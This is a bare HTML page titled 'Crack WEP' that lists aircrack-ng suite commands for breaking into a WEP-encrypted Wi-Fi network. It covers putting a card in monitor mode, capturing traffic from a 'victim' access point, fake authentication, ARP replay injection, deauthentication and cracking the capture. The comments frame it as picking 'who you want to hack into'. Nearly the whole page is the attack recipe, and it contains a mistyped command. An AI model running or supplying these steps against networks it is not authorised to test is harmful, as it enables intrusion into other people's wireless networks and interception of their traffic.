<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Crack WEP</title>
</head><body><br/>
<br/>
airmon-ng check kill #Check and kill unecessary processes<br/>
<br/>
airmon-ng start wlan0 &nbsp;#start your wireless interface into monitor mode (wlan0 might need to change)<br/>
<br/>
airodump-ng wlan0mon # Start monitoring on your network interface (wlan0mon might need to be changed)<br/>
<br/>
# Now start checking who you want to hack into. &nbsp;Write down your own mac address by using ifconfig -a and writing down the "ether" address<br/>
#Write down the channel - the ENC type IE WEP or WPA - BSSID - ESSID - ANY stations associated with the victim BSSID<br/>
<br/>
Channel: 6<br/>
BSSID: F8:ED:A5:8B:85:90 <br/>
ESSID: fart-boner<br/>
AP MAC: F8:ED:A5:8B:85:90 <br/>
Stations associated (MAC):<br/>
Your NIC's MAC: 00:c0:ca:5a:05:b7<br/>
<br/>
airomon-ng start wlan0mon 6 (the number 6 reflects the channel you are hacking on)<br/>
<br/>
airodump-ng -c 6 --bssid F8:ED:A5:8B:85:90 -w /root/Desktop/new-test wlan0mon &nbsp;<br/>
<br/>
aireplay-ng -1 0 -e fart-boner -a F8:ED:A5:8B:85:90 -h 00:c0:ca:5a:05:b7 wlan0mon<br/>
<br/>
aireplay-ng -3 -b F8:ED:A5:8B:85:90 -h 00:c0:ca:5a:05:b7 wlan0mon<br/>
<br/>
aireplay-ng -0 1 -a F8:ED:A5:8B:85:90 -c 00:c0:ca:5a:05:b7 wlan0mon<br/>
<br/>
aircrack-ng /root/Desktop/new-test-01.cap</body></html>